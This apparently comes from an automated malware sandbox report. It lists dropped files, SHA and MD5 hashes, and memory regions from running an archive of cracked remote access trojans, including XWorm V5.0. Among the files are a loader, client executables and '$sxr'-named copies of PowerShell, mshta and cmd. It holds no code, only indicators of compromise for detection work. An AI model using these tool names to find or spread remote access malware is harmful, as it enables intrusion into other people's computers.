SHA256 25df503a46e2ca3addaf64e219b385275633c34ae2fc91c33e33c36658ca5ab8
SHA512 e2586f688da6062cb7bd6ec63e013368ca8d5cb5fa8474cfd39eb809533d6891a2232732285578752fb1a79937db303e0805cd1b7ff41994d9e0257b8fdfeb7f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\797bcdd84ad8f1fc_0

MD5 9e0847dce25cdeaeda12df8e8defb8da
SHA1 c84a60c49acbb96449d556d0d40ba5ba62c86960
SHA256 04466e0e92c82a51cee14b84045795ad2cc1d52402d037d6e670c36475e05fd7
SHA512 1214733626ee6a7d44a689169be5ce7f7540b23a2d171741e4e986c4c79680ee952dc208df95f04d98a3763a5ed3ebf57f9a4d52737f43486b3c9e248d122b2a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\100c119758e181e5_0

MD5 d452b568d752ff9533d26434be14790a
SHA1 d79bae8f7ec358dcc99226560df043dff4ba2c50
SHA256 450da30854eb269172a4d3535318821727f89f077c8ddea87645d2b5a9ba0d1d
SHA512 a3c4034052f15ec79202c1d9c283b5ccac17a8d585dc46dbb1c650b29eb74045a091a2de117479fa2e54c18ecc30064b0310e2a8725e5742c8befeabb2ba947d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\0adb25820bb4edde_0

MD5 3f876b30da891453c8a760214c1667c4
SHA1 62adb59bbaed79e2a3264a9a184f1e678ea6478b
SHA256 47d1ce5cd4a1360bcd5a45a40a01616974b7166392b650f97d448b8c284a3c76
SHA512 b6fdc2c16fef4ea861dba3b2c093c98edb9a6e994a368d22cec58392853f6c3b95573447f5ea2d3aec6665d1fe3933953bda1dd14ba4897752c4dde6d9e069ee

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\eff6069cdfa2ccf8_0

MD5 e3f48d750437dd9496ed30cf61b851de
SHA1 ab19d73427265315aaf4454062b2570f7131726b
SHA256 4c55875856756a1dc00ee6b71f4315e3b061a56edb86ea87b74bc2d5d22b552a
SHA512 033eb1b6b5f985dfcb2988fce1dac9463ca51497fb21e3b87e9d7cf456301f86ec5f714ce03a8974e7773058a82acf61ddb55969a43f364bea79723654549171

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\dfe98b36f3f4e3c9_0

MD5 3c82ef632b15d6a7ed2e4bd327df3fb4
SHA1 8438dc89c32be46d577172f85628b91a23f3ab42
SHA256 73063ae4f8e83758d6a5fd461ff43b228af29eec89aaf49b263ee6433849fe59
SHA512 10680cfb9be680f30248be714ba74d04a32cf0a3da6db32652a1dbefa6b2ad25d3d752577d65c68c9c321c153c42be0fe32fa657eb20cbfa830278288e26017a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\1523f90f6da9c097_0

MD5 fd66ab3092452fb66b809ba1b87443fe
SHA1 e0fb9f4765dd85d34bcdd4a98d624bb3c4ac3e0a
SHA256 fc500e9fa386824c4fe7b933ae8a17b5be558dca63af73e1d7288ec888fde96a
SHA512 ca1130fd938c98de7328115256d6005982226d44bab80f32766b49b58109d583703bae77140a7569d0302f9008316deb3d025cf43963e1bdd4b065f18fccf622

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\0d3baf0145808a1f_0

MD5 4eb3214974db83df55c10660e9592788
SHA1 1c838eb8d525700c1fc69c24099562417a95dc5c
SHA256 7fb2e47ee8eae82de05f50fd8971a58480165e50b76b9515eb90cea462943810
SHA512 4df5229735c17ddf673a289f5e2f01d52de7781913c7e5275dc1b345cf24c5e346978ee703893bcfacce504821ca2e88693cb5ce7cc107bbd8558bc869118b28

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\6b02c8aaeede1db1_0

MD5 169c42813a8e4512e314bdea61838c66
SHA1 4c147323379b728d3e14eae45aa458f71ac56b0c
SHA256 31c25e803143c097df13f38049f9c1d7a35a3b688b2c4dd6afaba6e2408bb99a
SHA512 6f8727856c0fa6a7d154d4d6326ccb5d9d0daa3425867e3149f0a2db3962e0bb3c80ad5f91511f103f0004e3e7a5c05e07fda4cae0495d6258a021accb665375

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\6c0f7192dbe98fd4_0

MD5 f088beeeccd38547a175d31db6193a75
SHA1 efead5619bffc2d097943acb33ed753124d9dc58
SHA256 e53366fa62b8b8980f60e6cc03b14f7d7df3a50c2d977455ac026198709afbd5
SHA512 cb36e373a44a955905551e71a5c70e296ae8ec4a04046cf40b954e0dec505b13bf369b5810b2a9e038d75142c86f8c61484711f608f76cd2e14e1ec8a8f10aa8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\6b4b35d820554ebd_0

MD5 1227e49c0cb784e581745be877c1146c
SHA1 8e41a674136ed6c1c5dbf41eecdee4c0a4f649a0
SHA256 a5e0a484d53e9e22957bac77b3906cd043bc066718650fff135cc663334622ee
SHA512 bd75ecccf482a19dbbd8d453515d32ef9b9b3ba28c647dc25edc93c257c85af2cc256746a8a951a7c6597c11677cfc711ec4b3ff2461e9af7af3075d241c724a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\9ee14c8b771b1481_0

MD5 1d28ca56b32a23bbf806135050a1c947
SHA1 ecbad10419ace3bc359b9dfda05b568d4dd995d7
SHA256 76dfc6e2e5a049769516f4ccf9ed63f1200cd8408bb21069c15fe06ae3e4874b
SHA512 295d65b749ba6d2a727865dc2842b583ae3c638bc3e2313b13f9f56f7eeb33af02e22f37e54a9cbf71bb5b75bcab78d9542ce219e182912e4810893cdf94dc26

memory/4580-1315-0x00007FF94A940000-0x00007FF94B32C000-memory.dmp

memory/4580-1316-0x00007FF969EA0000-0x00007FF96A07B000-memory.dmp

memory/4580-1318-0x000002657C2E0000-0x000002657C2F0000-memory.dmp

memory/4580-1319-0x00007FF9674A0000-0x00007FF96754E000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 79d2d5d9bbc2913d9472a8a8329d54a6
SHA1 cdabfc5261124cf547144f4eea98d9713f8da7df
SHA256 a141110df187a0b4e3b71323df0f3c910de8feca16f9ed2085b30d5214418d95
SHA512 35256c2eb708dbe20e8c387ad5ef1e299342ff1b66cafb431ab449f51b417e97a601b7dbb86e1773eefdb9422957eb8e85122c22befda31508285ae64e271b99

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 8583510c1bf77c194b5874acd0893ee5
SHA1 92e071bcb50088f5048982087f3a1deaaffe87ea
SHA256 da06781b3693e66da94875b6ffe335b5ed52c69da780a719046ea0966a34d099
SHA512 8691dc90afde849fdb24ef95783bd13551edeb7c26a72b2f2620d0feae81bf7d4b5bd7163489800df0879c41539c2a69a186eba3dbdd78bb5ac87a9357180423

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 36b3241c0d155028a6bf6f34ae4bbf77
SHA1 c8d1d68ba0d323f1d0b6f97fe72f6b5373f3e10f
SHA256 ab4973a1c673f8017a20c7e3254082378ba5b4db4e75fd4b922ad5bc5da95aa5
SHA512 80e058b385d04b717512fefdc083c99f1728ba7230382248c0e2e69e1263a15eb8e220f43517122170f942eafe679365acc39b7e90454316934f15278474bb1a

memory/3556-1421-0x00007FF9674A0000-0x00007FF96754E000-memory.dmp

C:\Windows\$sxr-powershell.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 3cc07cafb9945f5b51ca3cc376ecd546
SHA1 f7dc6ffd8e516e889b83bc94fe14a037f1b74674
SHA256 9f19cb77e0dc2a89cce3dfa6f2dd7acebb6cde708d3a8929755c4bd25e4a5448
SHA512 8b91365cc5330603b410cab39c8361062fc81248ef60ea779c4c4d7fcb6155fbb7d1c10ef8bc4004d86db0c65d98d399b3c3eda7967a099e0e9f08dbbd00d69a

C:\Windows\$sxr-mshta.exe

MD5 98447a7f26ee9dac6b806924d6e21c90
SHA1 a67909346a56289b7087821437efcaa51da3b083
SHA256 c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed
SHA512 c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Windows\$sxr-cmd.exe

MD5 94912c1d73ade68f2486ed4d8ea82de6
SHA1 524ab0a40594d2b5f620f542e87a45472979a416
SHA256 9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9
SHA512 f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d

C:\Windows\$sxr-powershell.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

memory/3560-1566-0x00007FF9674A0000-0x00007FF96754E000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 597368053374155d5a51cabcc4efc92c
SHA1 50f77060bca42c4f2bd234bfc5e8aa69949d6cbd
SHA256 8ad0247d177c1fa7ad34401499f71afd9ae0b8ea7a8f7e801f32f6c5ffd6b065
SHA512 6f25b8de35f9680bbd16693f31b2b834b80b0c4ba5f8ca497013288475c7e64c3471ade91703a2802436ed0957aadf846baec1e03dc842bff6782eca94c3bac1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 cb3e7f75eb223a203f7a4923bc2d8c85
SHA1 ff7828f2ae2044f79ee00c12d672941f06c6481d
SHA256 1e0fee85579ab7fbe3ae03c7929b095e56fdf2eaaaaf0c0f319b7b8e0be90706
SHA512 d3b9c0b9736e60a69012683780f9faca8e92f6f38bce14d561e64b88e09e0ac0a591dec2d1a08923efb9bb38d115f04378785d1e25c4489936214f4f8f62c7a0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 586217f760c87a6d267dad5562abafd4
SHA1 3230ceed2de632247d4a7349711be87bfbe34377
SHA256 b811da8eee1981be5854c17614770ad78a149636a404d37d47f1525eb2ab3891
SHA512 dbd3abedd216949dce36c976f8d0c06f9ab6bfbe43ddfe4a8ec09962aa8abf4361f3e8504dd56cd8201ba7eff9d8233ba6965788942eb775707accebd513605b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 c5d8920b084d3d8f6dc303acb8641ba1
SHA1 064b9c2a3934e1e7785b86834daa10da9ed5cbc3
SHA256 91d6ee2e36d4ea5a2715bdd291501fb26e9efb23739cbc929c6dae0415d5b513
SHA512 b52e104b33f773cfc30b7f3b19eb4ec695b3a84faf5d93447020ad5f032a898014722246c4a9eb5d7030ab379e3e005c9b51b06963255f65f878ac132fca4778

C:\Users\Admin\Desktop\all-cracked-rats-main.zip

MD5 490c2953c3444d906dcc1fc4926fe457
SHA1 b3063ad8e74079fba5c218cc7e0ba119870ad1bb
SHA256 abb182a3e0074d0a5e8b4f62b54f18117839d71aec73c5a3100587fbb8d9b20e
SHA512 fa8218979721293272de6ce3a247f1c9ad67446a2ea2d23b76186d3a73e0b0a097f0770a8f3e847e5bf571c4f7a13299f765d1663f09cdcf8bde783d2beecec5

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\Icons\icon (15).ico

MD5 e3143e8c70427a56dac73a808cba0c79
SHA1 63556c7ad9e778d5bd9092f834b5cc751e419d16
SHA256 b2f57a23ecc789c1bbf6037ac0825bf98babc7bf0c5d438af5e2767a27a79188
SHA512 74e0f4b55625df86a87b9315e4007be8e05bbecca4346a6ea06ef5b1528acb5a8bb636ef3e599a3820dbddcf69563a0a22e2c1062c965544fd75ec96fd9803fc

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\crack.exe

MD5 dbf35eac1c87ed287c8f7cba33d133b5
SHA1 d1dbfba561f8112e5099507a18cd9465b4fcb577
SHA256 16094ff7a11c1960da481a9e106676fd94902e64c5625549493dca97bde72fcd
SHA512 c4b2112773036d89ffb1faa44ce00e1ae5bb586c7bfc3219549f32adaf74e545687ebe4682db789cf4600dcbc38d0545dfec171d92d15244cb7234736ec5b532

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\crack.exe

MD5 dbf35eac1c87ed287c8f7cba33d133b5
SHA1 d1dbfba561f8112e5099507a18cd9465b4fcb577
SHA256 16094ff7a11c1960da481a9e106676fd94902e64c5625549493dca97bde72fcd
SHA512 c4b2112773036d89ffb1faa44ce00e1ae5bb586c7bfc3219549f32adaf74e545687ebe4682db789cf4600dcbc38d0545dfec171d92d15244cb7234736ec5b532

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\XWormLoader.exe

MD5 8612c9754408ff7c62e3a7e199c42693
SHA1 29061464a3dd30e0f4c726fa3b09df950b04fdd4
SHA256 86126ef2291e1edc20ff76c614a918299cbafcddb0c0e27ee4e26aa0edb36211
SHA512 f7b7ea360ff22d2ebad0e5927b833503d89f019543cd4baaa0a6bef8b3a99d4abbdf2cb1d956927857342f5be7c104b0380a033c540207f25e69a990225f8ad5

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\XWormLoader.exe

MD5 8612c9754408ff7c62e3a7e199c42693
SHA1 29061464a3dd30e0f4c726fa3b09df950b04fdd4
SHA256 86126ef2291e1edc20ff76c614a918299cbafcddb0c0e27ee4e26aa0edb36211
SHA512 f7b7ea360ff22d2ebad0e5927b833503d89f019543cd4baaa0a6bef8b3a99d4abbdf2cb1d956927857342f5be7c104b0380a033c540207f25e69a990225f8ad5

memory/3676-1817-0x0000000000400000-0x0000000000473000-memory.dmp

memory/3676-1821-0x0000000000400000-0x0000000000473000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe

MD5 39d81ca537ceb52632fbb2e975c3ee2f
SHA1 0a3814bd3ccea28b144983daab277d72313524e4
SHA256 76c4d61afdebf279316b40e1ca3c56996b16d760aa080d3121d6982f0e61d8e7
SHA512 18f7acf9e7b992e95f06ab1c96f017a6e7acde36c1e7c1ff254853a1bfcde65abcdaa797b36071b9349e83aa2c0a45c6dfb2d637c153b53c66fc92066f6d4f9a

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 dbf35eac1c87ed287c8f7cba33d133b5
SHA1 d1dbfba561f8112e5099507a18cd9465b4fcb577
SHA256 16094ff7a11c1960da481a9e106676fd94902e64c5625549493dca97bde72fcd
SHA512 c4b2112773036d89ffb1faa44ce00e1ae5bb586c7bfc3219549f32adaf74e545687ebe4682db789cf4600dcbc38d0545dfec171d92d15244cb7234736ec5b532

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 dbf35eac1c87ed287c8f7cba33d133b5
SHA1 d1dbfba561f8112e5099507a18cd9465b4fcb577
SHA256 16094ff7a11c1960da481a9e106676fd94902e64c5625549493dca97bde72fcd
SHA512 c4b2112773036d89ffb1faa44ce00e1ae5bb586c7bfc3219549f32adaf74e545687ebe4682db789cf4600dcbc38d0545dfec171d92d15244cb7234736ec5b532

memory/4632-1830-0x0000000000400000-0x00000000004DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe

MD5 39d81ca537ceb52632fbb2e975c3ee2f
SHA1 0a3814bd3ccea28b144983daab277d72313524e4
SHA256 76c4d61afdebf279316b40e1ca3c56996b16d760aa080d3121d6982f0e61d8e7
SHA512 18f7acf9e7b992e95f06ab1c96f017a6e7acde36c1e7c1ff254853a1bfcde65abcdaa797b36071b9349e83aa2c0a45c6dfb2d637c153b53c66fc92066f6d4f9a

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\XWorm V5.0.exe

MD5 3167d13d705dce86c4cd6b9765e220aa
SHA1 ec50d9b045753173f9f6aa18af5c684a619fd616
SHA256 9836b324a9a693050de20893b9ec1f6bd9c7d9b03eaf21112947cb82183c2016
SHA512 88e59013ca52f9e62975d16d2085e90a0fceffc8de1f0d7aed0bff589a09720cce8e24c147edeeada4af5d5319f5ac5df5a686b21fa1f41bdd3ffab1bc54a3d4

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\XWorm V5.0.exe

MD5 3167d13d705dce86c4cd6b9765e220aa
SHA1 ec50d9b045753173f9f6aa18af5c684a619fd616
SHA256 9836b324a9a693050de20893b9ec1f6bd9c7d9b03eaf21112947cb82183c2016
SHA512 88e59013ca52f9e62975d16d2085e90a0fceffc8de1f0d7aed0bff589a09720cce8e24c147edeeada4af5d5319f5ac5df5a686b21fa1f41bdd3ffab1bc54a3d4

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 dbf35eac1c87ed287c8f7cba33d133b5
SHA1 d1dbfba561f8112e5099507a18cd9465b4fcb577
SHA256 16094ff7a11c1960da481a9e106676fd94902e64c5625549493dca97bde72fcd
SHA512 c4b2112773036d89ffb1faa44ce00e1ae5bb586c7bfc3219549f32adaf74e545687ebe4682db789cf4600dcbc38d0545dfec171d92d15244cb7234736ec5b532

C:\Users\Admin\AppData\Local\Temp\XWorm V5.0.exe

MD5 227494b22a4ee99f48a269c362fd5f19
SHA1 d32d08cf93d7f9450aee7e1e6c39d9d83b9a35c9
SHA256 7471ff7818da2e044caf5bd89725b6283ed0304453c18a0490d6341f3a010ca2
SHA512 71070e6b8042fa262ce12721e6c09104aec0a61ac0d6022f59f838077109b9476a5c1f8409242d93888eff6d36f0ee76337481fefe6f05e0f1243efbf350bee0

C:\Users\Admin\AppData\Local\Temp\XWorm V5.0.exe

MD5 227494b22a4ee99f48a269c362fd5f19
SHA1 d32d08cf93d7f9450aee7e1e6c39d9d83b9a35c9
SHA256 7471ff7818da2e044caf5bd89725b6283ed0304453c18a0490d6341f3a010ca2
SHA512 71070e6b8042fa262ce12721e6c09104aec0a61ac0d6022f59f838077109b9476a5c1f8409242d93888eff6d36f0ee76337481fefe6f05e0f1243efbf350bee0

memory/396-1841-0x0000000000400000-0x0000000000F40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CE8806DA1EF0F1BB553DFF4FC5E9FCCD\CE8806DA1EF0F1BB553DFF4FC5E9FCCD.dll

MD5 a239b7cac8be034a23e7e231d3bcc6df
SHA1 ae3c239a17c2b4b4d2fba1ec862cf9644bf1346d
SHA256 063099408fd5fb10a7ea408a50b7fb5da1c36accc03b9b31c933df54385d32b8
SHA512 c79a2b08f7e95d49a588b1f41368f0dd8d4cd431ad3403301e4d30826d3df0907d01b28ef83116ad6f035218f06dbdf63a0f4f2f9130bba1b0b7e58f9fc67524

\Users\Admin\AppData\Local\Temp\CE8806DA1EF0F1BB553DFF4FC5E9FCCD\CE8806DA1EF0F1BB553DFF4FC5E9FCCD.dll

MD5 a239b7cac8be034a23e7e231d3bcc6df
SHA1 ae3c239a17c2b4b4d2fba1ec862cf9644bf1346d
SHA256 063099408fd5fb10a7ea408a50b7fb5da1c36accc03b9b31c933df54385d32b8
SHA512 c79a2b08f7e95d49a588b1f41368f0dd8d4cd431ad3403301e4d30826d3df0907d01b28ef83116ad6f035218f06dbdf63a0f4f2f9130bba1b0b7e58f9fc67524

memory/3676-1852-0x00000000070B0000-0x00000000074B0000-memory.dmp

memory/3676-1851-0x0000000005230000-0x0000000005237000-memory.dmp

memory/3676-1854-0x00000000070B0000-0x00000000074B0000-memory.dmp

memory/1796-1868-0x0000000006F90000-0x0000000007390000-memory.dmp

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\XWorm V5.0.exe

MD5 3167d13d705dce86c4cd6b9765e220aa
SHA1 ec50d9b045753173f9f6aa18af5c684a619fd616
SHA256 9836b324a9a693050de20893b9ec1f6bd9c7d9b03eaf21112947cb82183c2016
SHA512 88e59013ca52f9e62975d16d2085e90a0fceffc8de1f0d7aed0bff589a09720cce8e24c147edeeada4af5d5319f5ac5df5a686b21fa1f41bdd3ffab1bc54a3d4

C:\Users\Admin\AppData\Local\Temp\XWorm V5.0.exe

MD5 227494b22a4ee99f48a269c362fd5f19
SHA1 d32d08cf93d7f9450aee7e1e6c39d9d83b9a35c9
SHA256 7471ff7818da2e044caf5bd89725b6283ed0304453c18a0490d6341f3a010ca2
SHA512 71070e6b8042fa262ce12721e6c09104aec0a61ac0d6022f59f838077109b9476a5c1f8409242d93888eff6d36f0ee76337481fefe6f05e0f1243efbf350bee0

C:\Users\Admin\AppData\Local\Temp\XWorm V5.0.exe

MD5 227494b22a4ee99f48a269c362fd5f19
SHA1 d32d08cf93d7f9450aee7e1e6c39d9d83b9a35c9
SHA256 7471ff7818da2e044caf5bd89725b6283ed0304453c18a0490d6341f3a010ca2
SHA512 71070e6b8042fa262ce12721e6c09104aec0a61ac0d6022f59f838077109b9476a5c1f8409242d93888eff6d36f0ee76337481fefe6f05e0f1243efbf350bee0

C:\Users\Admin\AppData\Local\Temp\XWorm V5.0.exe

MD5 227494b22a4ee99f48a269c362fd5f19
SHA1 d32d08cf93d7f9450aee7e1e6c39d9d83b9a35c9
SHA256 7471ff7818da2e044caf5bd89725b6283ed0304453c18a0490d6341f3a010ca2
SHA512 71070e6b8042fa262ce12721e6c09104aec0a61ac0d6022f59f838077109b9476a5c1f8409242d93888eff6d36f0ee76337481fefe6f05e0f1243efbf350bee0

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 dbf35eac1c87ed287c8f7cba33d133b5
SHA1 d1dbfba561f8112e5099507a18cd9465b4fcb577
SHA256 16094ff7a11c1960da481a9e106676fd94902e64c5625549493dca97bde72fcd
SHA512 c4b2112773036d89ffb1faa44ce00e1ae5bb586c7bfc3219549f32adaf74e545687ebe4682db789cf4600dcbc38d0545dfec171d92d15244cb7234736ec5b532

memory/3556-1883-0x0000000000400000-0x0000000000F40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CE8806DA1EF0F1BB553DFF4FC5E9FCCD\CE8806DA1EF0F1BB553DFF4FC5E9FCCD.dll

MD5 a239b7cac8be034a23e7e231d3bcc6df
SHA1 ae3c239a17c2b4b4d2fba1ec862cf9644bf1346d
SHA256 063099408fd5fb10a7ea408a50b7fb5da1c36accc03b9b31c933df54385d32b8
SHA512 c79a2b08f7e95d49a588b1f41368f0dd8d4cd431ad3403301e4d30826d3df0907d01b28ef83116ad6f035218f06dbdf63a0f4f2f9130bba1b0b7e58f9fc67524